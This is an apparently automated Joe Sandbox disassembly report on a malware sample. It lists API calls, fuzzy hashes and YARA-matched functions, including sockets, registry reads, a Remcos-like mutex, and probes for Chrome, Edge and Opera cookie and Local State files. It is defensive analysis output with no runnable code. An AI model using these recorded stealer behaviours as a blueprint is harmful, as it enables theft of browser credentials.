                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                • String ID: Rmc-RNN6CM
                                                                                                                                                                • API String ID: 1925916568-769163239
                                                                                                                                                                • Opcode ID: 6eb2ae896c32eb6a0578d84d52c1a0773fb5f50113e9d1124157d35c9959520f
                                                                                                                                                                • Instruction ID: e2cb3ba2077760c54f250c20a31744ee16f48c522f5f06b24c8d95b8e65cd5b9
                                                                                                                                                                • Opcode Fuzzy Hash: 6eb2ae896c32eb6a0578d84d52c1a0773fb5f50113e9d1124157d35c9959520f
                                                                                                                                                                • Instruction Fuzzy Hash: 97C04CB13542046BFB0827759C5ABFD2956AB94702F150539B107D55E2CA5D4C50A522
                                                                                                                                                                APIs
                                                                                                                                                                • __freea.LIBCMT ref: 6FEA1209
                                                                                                                                                                  • Part of subcall function 6FE993EF: HeapAlloc.KERNEL32(00000000,?,?,?,00000003,6FE9681B,?,?,?,?,00000000,?,00000000,?,?,6FE98FBF), ref: 6FE99421
                                                                                                                                                                • __freea.LIBCMT ref: 6FEA121C
                                                                                                                                                                • __freea.LIBCMT ref: 6FEA1229
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __freea$AllocHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 85559729-0
                                                                                                                                                                • Opcode ID: 26d0aca34f6779576cab190261e6a3068a74fe973838616bbcc69285b8fe7e2c
                                                                                                                                                                • Instruction ID: fd9e19b02fa7380cfcd3f9e72a6fcf606bca34405fd05960caa98356c489c3b6
                                                                                                                                                                • Opcode Fuzzy Hash: 26d0aca34f6779576cab190261e6a3068a74fe973838616bbcc69285b8fe7e2c
                                                                                                                                                                • Instruction Fuzzy Hash: C151A6725002066BEB118FE5EC80DAF3EA9DF95258B21012EFD14DA254E776D8509A71
                                                                                                                                                                APIs
                                                                                                                                                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000,000655B4,00000008,00000004,00000000,0000000C,00000000,?,000D1ED8,?), ref: 00064C67
                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,000655B4,00000073,?,?,000C2790,?,?,?,?), ref: 00064C95
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EventObjectSingleWaitsend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3963590051-0
                                                                                                                                                                • Opcode ID: f590979b3a44e14d79fddda2d744927c7e68cb6ac7ca72fdb9d00e25b2354987
                                                                                                                                                                • Instruction ID: e9867657ffd0224a1cc42caf752897dd48c110b82dccfeca534016a54c0c17f1
                                                                                                                                                                • Opcode Fuzzy Hash: f590979b3a44e14d79fddda2d744927c7e68cb6ac7ca72fdb9d00e25b2354987
                                                                                                                                                                • Instruction Fuzzy Hash: 74216272A00609AFD705EFA4DC92DEEB76AFF10310B108229F516576E2DF756D05C790
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 6FE7C3C7
                                                                                                                                                                • GetFileInformationByHandleEx.KERNEL32(?,00000009,00000000,00000008), ref: 6FE7C3F9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7C46B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileHandleInformation$ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3070998852-0
                                                                                                                                                                • Opcode ID: 0b28ee133366c9ec2718006fbf43d0fccc31c5147de14c674e997bca2e7e793e
                                                                                                                                                                • Instruction ID: 6105aa009e4247b3065e4f92cceaa15ed29b50f15ea019f8de46f2c259b8efb0
                                                                                                                                                                • Opcode Fuzzy Hash: 0b28ee133366c9ec2718006fbf43d0fccc31c5147de14c674e997bca2e7e793e
                                                                                                                                                                • Instruction Fuzzy Hash: 1D3148B0D00B098BDB20CF59C5447AAFBF4BF99304F10861ED89AA6651E774B585CB90
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,000D22B8), ref: 00071AEA
                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00071B03
                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 00071B0E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                • Opcode ID: 829b17ace465e5e9ac47e3bf35e1de4eaf6e922aa9310ae3ec604af5133ef245
                                                                                                                                                                • Instruction ID: 9d8e72a5b18b4ee47ba9911dd2d24af97fc0b7448c5851322f831939c8588dba
                                                                                                                                                                • Opcode Fuzzy Hash: 829b17ace465e5e9ac47e3bf35e1de4eaf6e922aa9310ae3ec604af5133ef245
                                                                                                                                                                • Instruction Fuzzy Hash: C4014B3190012DBBDF216F91DC45DEF7F79EF05350F008151BA1862061E73A8965DBA0
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00071939
                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,000D22B8), ref: 00071957
                                                                                                                                                                • RegCloseKey.KERNEL32(?), ref: 00071962
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,000D1ED8,000D1ED8,?,00064D71,00000000,00000000,00000000,?,000D1ED8,?), ref: 00064CC9
                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,00064D71,00000000,00000000,00000000,?,000D1ED8,?), ref: 00064CE5
                                                                                                                                                                • recv.WS2_32(FFFFFFFF,000D1ED8,?,00000000), ref: 00064CFA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EventObjectSingleWaitrecv
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,000D2318,?,?,0006E19C,del), ref: 000718E6
                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,0006E19C,00000000,00000000,00000000,00000000,?,?,0006E19C,del), ref: 000718FA
                                                                                                                                                                • RegCloseKey.KERNEL32(?,?,?,0006E19C,del), ref: 00071905
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                • String ID: $
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C1CB: PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0006C3DD), ref: 0006C1FE
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,00066537), ref: 0006C3F7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: Network\Cookies
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C105: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0006C245), ref: 0006C138
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,00066542), ref: 0006C45A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: User Data\Local State
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C168: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,0006C314), ref: 0006C19B
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,0006654D), ref: 0006C4BD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: User Data\Local State
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C1CB: PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0006C3DD), ref: 0006C1FE
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,00066558), ref: 0006C520
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: Local State
                                                                                                                                                                • API String ID: 521105947-22827320
                                                                                                                                                                • Opcode ID: 943479deeced87a09ecb63624d9d2009161d4bb7400834c7be6a30d60f6013bb
                                                                                                                                                                • Instruction ID: e6ac7d6b8cc8943fb4ea43d50a1815e2fc8e97e16833dea415e1e98310a8b129
                                                                                                                                                                • Opcode Fuzzy Hash: 943479deeced87a09ecb63624d9d2009161d4bb7400834c7be6a30d60f6013bb
                                                                                                                                                                • Instruction Fuzzy Hash: B3F08231A102299A8B04F7E4EC53CFEB77AAF05710B44412AB902A3193EF70AA4987D0
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 000799BA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 1890195054-2766056989
                                                                                                                                                                • Opcode ID: 9050c5fc0b543d3a5147498fa1c846802d3a5ee810ebd6e50de0d96a7edc29ed
                                                                                                                                                                • Instruction ID: 5bd6351dc2371cbe2b27d916dfe97a0f90a75eec17a9b1def8bea926bfb5416d
                                                                                                                                                                • Opcode Fuzzy Hash: 9050c5fc0b543d3a5147498fa1c846802d3a5ee810ebd6e50de0d96a7edc29ed
                                                                                                                                                                • Instruction Fuzzy Hash: 5AD017B5802328AFC720DFA8E904A8DBBFCFB08210F00016AEC49E3700E774A8008B91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6FE9B951: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 6FE9B97C
                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,6FE9BC61,?,00000000,?,00000000,?), ref: 6FE9BE7B
                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,6FE9BC61,?,00000000,?,00000000,?), ref: 6FE9BEB7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 546120528-0
                                                                                                                                                                • Opcode ID: c12e60de3dcd9893bfcc5d1754bfcc7ce4bad826bd9e8b5b059e4a0e82a61c57
                                                                                                                                                                • Instruction ID: 10561ffd1be86fac20b3ab0dac3f64513b04d1b57ec1174e724909926b7c959f
                                                                                                                                                                • Opcode Fuzzy Hash: c12e60de3dcd9893bfcc5d1754bfcc7ce4bad826bd9e8b5b059e4a0e82a61c57
                                                                                                                                                                • Instruction Fuzzy Hash: E151F470E043459EDB20CF79C8906AABFF5EF46308F24446ED0968B291D775A646CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNEL32 ref: 6FE480A7
                                                                                                                                                                  • Part of subcall function 6FE74280: CreateWaitableTimerExW.KERNEL32(00000000,00000000,00000002,001F0003,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE742AB
                                                                                                                                                                  • Part of subcall function 6FE74280: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74311
                                                                                                                                                                  • Part of subcall function 6FE74280: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE7431E
                                                                                                                                                                  • Part of subcall function 6FE74280: CloseHandle.KERNEL32(00000000,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74327
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: TimerWaitable$AllocCloseCreateHandleObjectSingleVirtualWait
                                                                                                                                                                • String ID: fo
                                                                                                                                                                • API String ID: 3175046113-2511409620
                                                                                                                                                                • Opcode ID: 6f40ed829f073feb406e1d0818b7925a92e0cec4a6bada2ff18dfdea4bfdf245
                                                                                                                                                                • Instruction ID: 69a67959ca5c29bbe5aad7cd2eaf2d2f160ef409ebb22115a06892e774dd5dd3
                                                                                                                                                                • Opcode Fuzzy Hash: 6f40ed829f073feb406e1d0818b7925a92e0cec4a6bada2ff18dfdea4bfdf245
                                                                                                                                                                • Instruction Fuzzy Hash: 5E81BFB4904318CFDB14CF68D985B8DBBB0BF4A304F20829ED819AB391D7359A84CF91
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNEL32(00000000,?,Function_0003D6D0,00000000,00010000,00000000), ref: 6FE7D5DB
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7D633
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateErrorLastThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1689873465-0
                                                                                                                                                                • Opcode ID: f0d428348aa2465c87983cacb115ae401860f1f8623d360b189f4aeda571a4e0
                                                                                                                                                                • Instruction ID: 069a9e8cf4b9de9a850419d9b38d19829ca1a981639a027871766999577cb73a
                                                                                                                                                                • Opcode Fuzzy Hash: f0d428348aa2465c87983cacb115ae401860f1f8623d360b189f4aeda571a4e0
                                                                                                                                                                • Instruction Fuzzy Hash: F03181B5A003099FDB20DF58DC45B9ABFB5FF09714F144029EA58A7381D771A910CBA5
                                                                                                                                                                APIs
                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6FE90963
                                                                                                                                                                  • Part of subcall function 6FE90E1B: InitializeSListHead.KERNEL32(6FED3C88,6FE9096D,6FEBB238,00000010,6FE908FE,?,?,?,6FE90B26,?,00000001,?,?,00000001,?,6FEBB280), ref: 6FE90E20
                                                                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6FE909CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3231365870-0
                                                                                                                                                                • Opcode ID: d365bb0fd9fedb390634005b26fb25d4c25a7a57058b53e12e2207156f77299b
                                                                                                                                                                • Instruction ID: 4902172255f9e427c4609a3e754d8161d991a83fe473c7d8567dfddcee5e4371
                                                                                                                                                                • Opcode Fuzzy Hash: d365bb0fd9fedb390634005b26fb25d4c25a7a57058b53e12e2207156f77299b
                                                                                                                                                                • Instruction Fuzzy Hash: A3212432548305AEEF016BB898053DD3FA28F9336CF70541ECA446B2C2CB729142C6B6
                                                                                                                                                                APIs
                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00064994
                                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,00000000,?,?,?,?,?,000654A7,?,?,00000000), ref: 000649D0
                                                                                                                                                                  • Part of subcall function 000649E0: WSAStartup.WS2_32(00000202,00000000), ref: 000649F5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateEventStartupsocket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1953588214-0
Memory Dump Source
• Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
• Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_60000_task.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• LCMapStringEx.KERNEL32(?,6FEA1144,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 6FE98BFD
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,6FEA1144,?,?,-00000008,?,00000000), ref: 6FE98C1B
Memory Dump Source
• Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
• Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
